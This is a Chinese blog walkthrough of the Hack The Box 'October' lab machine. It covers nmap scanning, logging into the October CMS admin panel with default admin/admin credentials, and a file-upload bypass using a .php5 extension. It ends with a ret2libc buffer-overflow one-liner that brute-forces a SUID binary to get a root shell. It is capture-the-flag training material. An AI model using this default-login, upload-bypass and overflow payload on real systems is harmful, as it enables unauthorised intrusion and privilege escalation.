HackTheBox::October

最新推荐文章于 2024-07-17 23:48:55 发布
最新推荐文章于 2024-07-17 23:48:55 发布
阅读量90 收藏
点赞数
分类专栏: Hack The Box 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46743202/article/details/127261469
版权

0x00 信息收集

nmap -Pn -p- -T4 --min-rate=1000 10.10.10.16
image.png
nmap -Pn -p 22,80 -sCV 10.10.10.16
image.png
查看80端口的服务,发现是October CMS
image.png
目录枚举
image.png
image.png
使用admin/admin成功登录后台
image.png

0x01 漏洞利用

image.png
后台存在上传绕过,只需要将php后缀更改为php5即可。
image.png

0x02 权限提升

上传LinEnums.sh进行枚举
image.png
考察缓冲区溢出
利用nc把ovrflw文件拷贝至本地
image.png
image.png
使用gdb查看该文件,可以看到strcpy函数,该函数常常存在缓冲区溢出问题。
image.png
先尝试生成150个字符
image.png
查找EIP
image.png
查找偏移量
image.png
Now when we try to insert shellcode into the buffer but we were unable to execute it because of DEP. It prevents code from being executed in the stack. Now we are going to do a ret2libc attack to execute a process already present in the process’ executable memory. We go into the target machine and find ASLR in enabled so we have to brute force the address. Now we find the address of system, exit and /bin/sh.
image.png
payload(system+exit+s/bin/sh):

while true; do /usr/local/bin/ovrflw $(python -c 'print "A" * 112 +"\x00\x00\xe1\xf7\x50\x29\xe0\xf7\x38\x73\xf5\xf7"'); done

image.png

aya3t
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
hackthebox - october (考点:october cms安全)
冬萍子癸水
05-24 478
1 扫描 常规端口,22想到ssh登录,80进web搜集信息,nmap扫描里看到80运行着October CMS 22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 1024 79:b1:35:b6:d1:25:12:a3:0c:b5:2e:36:9c:33:26:28 (DSA) | 2048 16:08:68:51:d1:7b:07:5a:34:
smallgdpr:OctoberCMS插件可应对GDPR
03-20
OctoberCMS后端 只需在搜索字段中查找“ Small GDPR”即可: 设置>更新和插件>安装插件 权限 设置>管理员 您可以设置权限以限制对“设置”>“小型插件”>“ Small GDPR”和消息列表的访问。 快速入门指南 饼干 安装...
Hack the box靶机 October
菜浪马废的博客
05-25 294
搜了一下october 有漏洞 然后默认的后台是/backend 试了一下密码admin:admin 竟然进去了???? 有文件上传功能 shel.php 抓包 改成*.php5 右侧click here 拿到权限 dirb也扫出来后台了 但是我都已经不需要了 接下来是缓存区溢出了 正在看 所以就写到这吧 ...
No.98-HackTheBox-Linux-October-Walkthrough渗透学习
qq_34801745的博客
05-14 336
** HackTheBox-Linux-October-Walkthrough ** 靶机地址:https://www.hackthebox.eu/home/machines/profile/15 靶机难度:初级(4.3/10) 靶机发布日期:2017年10月30日 靶机描述: October is a fairly easy machine to gain an initial foothold on, however it presents a fair challenge for users who
hackthebox】【Challenges】【Cartographer】
大方子
02-01 981
一个来自HTB的web挑战   问题陈述是这样的“ 一些地下黑客正在开发一个新的命令和控制服务器。你能闯入并看看他们在做什么吗?“并提交flag   ==================================================================================== 打开页面如下   看下网页源代码   第一反应的话...
hackthebox通关手记(持续更新)
weixin_34054931的博客
07-13 991
简介: 花了点时间弄了几道题目。以前我是用windows渗透居多,在kali linux下渗透测试一直不怎么习惯。通过这几天做这些题目感觉顺手多了。有些题目脑洞也比较大,感觉很多也不适合于实际的环境 10.10.10.5 这题比较简单,ftp可以匿名登录并且可以put文件:anonymous,上传一句话或者是大马即可期间有一个问题就是:大马下的shell不能type root.txt我...
Hack The Box 之 October靶机
Karka_的博客
08-15 45
October靶机在hack the box中属于难度中等的靶机,其渗透过程涉及的知识点属于比较常见的类型,但是在最后一步提权的步骤中,涉及到CTF中pwn的栈溢出知识点,相较于之前的提权方法来说,可以说新颖很多,没有依赖现成的工具,对于之后的安全学习之路上,需要兼顾二进制和web,争取做一个全栈的小白。n的栈溢出知识点,相较于之前的提权方法来说,可以说新颖很多,没有依赖现成的工具,对于之后的安全学习之路上,需要兼顾二进制和web,争取做一个全栈的小白。
OctoberCMS:十月CMS网站
06-21
十月安装向导向导安装是推荐的安装方式。 它比命令行安装更简单,不需要任何特殊技能。 在您的服务器上准备一个空目录。 它可以是子目录、域根或子域。 。 将安装程序存档解压缩到准备好的目录。...
OctoberCMS-RoomBooking:OctoberCMS的预订插件
04-28
OctoberCMS的预订插件一个简单的插件,可管理October CMS的客房和预订编辑室该插件使用markdown标记来描述房间。 您可以使用任何Markdown语法以及可能的一些特殊标签来嵌入图像(尚未测试)。 总体而言,您可能希望...
Krunker-Hack-October-2019:此hack对所有人都是免费的
04-14
【标题】"Krunker-Hack-October-2019:此hack对所有人都是免费的",这个标题涉及的是一个针对在线游戏Krunker的黑客工具,该工具在2019年10月被发布,并且是免费提供给所有人的。Krunker是一款流行的浏览器射击游戏,...
debugbar-plugin:将PHP Debugbar与October CMS集成
05-23
调试栏插件 轻松查看10月份应用程序的运行情况。 安装 要从安装,请单击“添加到项目”按钮,然后选择要添加到该项目并为插件付费的项目。 将插件添加到项目后,转到后端并检查是否有更新以引入插件。...
自建SMTP服务器:如何保障安全稳定的发信?
danplus的博客
07-17 322
自建SMTP服务器虽然可以提供更高的灵活性和控制力,但也需要投入大量的时间和精力来保障其安全和稳定。AokSend,指导您自建SMTP服务器,结合API接口,高效稳定,让邮件营销更加自主可控!
Evil-WinRM一键测试主机安全情况(KALI工具系列四十四)
LNN0212的博客
07-17 461
Kali Linux 是一个功能强大、多才多艺的 Linux 发行版 ,广泛用于网络安全社区。它具有全面的预安装工具和功能集,使其成为安全测试、数字取证、事件响应和恶意软件分析的有效平台。作为使用者,你可以把它理解为一个特殊的Linux 发行版 ,集成了精心挑选的渗透测试和安全审计的工具,供渗透测试和安全设计人员使用,也可称之为平台或者框架。注意,一定只能用于自己设备的连通性测试哦!
内容安全(深度行为检测技术、IPS、AV、入侵检测方法)
最新发布
Thewei666的博客
07-17 717
区分不同的签名。
防洪墙的安全内容检测+http请求头
代码其实很简单
07-17 329
--1、深度检测技术(DPI和DPF是所有内容检测都必须要用到的技术);DPI--深度包检测,针对完整的数据包,进行内容的识别和检测;---2、DFI ---深度流检测 ,---看名字都知道肯定是对数据流进行检测的技术;--2、IPS ---入侵防御--3、IDS---入侵检测,AV(反病毒) http请求头,http状态码
全文翻译 | OWASP《LLM安全与治理检查清单》
lurenjia404的博客
07-17 384
本文是OWASP(开放式网络应用安全项目)发布的《LLM AI安全与治理清单》(以下简称“清单”),旨在为使用大型语言模型(LLM)的组织提供安全与治理方面的指导。清单强调了负责任和可信的人工智能(AI)的重要性,并指出AI技术,尤其是LLM,在创新、效率和商业成功方面具有巨大潜力,同时也带来了明显的挑战。文中讨论了LLM面临的挑战,包括控制和数据平面的不可分割性、非确定性设计、语义搜索的使用等,并强调了LLM增加的攻击面和相关风险。
安全防御-用户认证综合实验
weixin_69863399的博客
07-12 471
生产区访问DMZ需要进行protal认证,设立生产区用户架构,至少包含三个部门,每个部门三个用户,用户统一密码openlab@123,首次登录需要修改密码,用户过期时间设定为10天,用户不允许多人使用。游客区人员不固定,不允许访问DMZ区和生产区,统一使用Guest用户登录,密码Admin@123,游客仅有访问公司门户网站和上网的权利,门户网站地址10.0.3.10。做相关的认证策略,研发部IP地址(10.0.1.20)固定,访问DMZ区使用匿名认证,研发部需要用户绑定IP地址,访问DMZ区使用免认证;
HLS加密技术:保障流媒体内容安全的利器
jiamisoft的博客
07-17 507
HLS是一种由苹果公司提出的基于HTTP的流媒体网络传输协议,它允许将音视频文件编码为可播放的多媒体流,并通过HTTP协议进行传输。这种传输方式不仅具有广泛的网络适应性,还支持自适应比特率和分辨率,从而为用户提供流畅的观看体验。然而,HLS本身并不包含专门的加密方式,需要配合其他加密和防护措施来实现内容的安全传输。HLS加密技术的核心思想是将视频流分段,并对每个分段进行加密处理。在客户端播放时,需要先获取解密密钥才能正常播放。
JDK9-JSE-Java Accessibility Guide-30.pdf
08-08
本资源是一份名为《JDK9-JSE-Java Accessibility Guide-30》的技术文档,它属于Java Platform, Standard Edition(Java SE)系列,专为Java 9版本而设计。该指南详细介绍了Java平台的可访问性特性,旨在帮助开发者...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值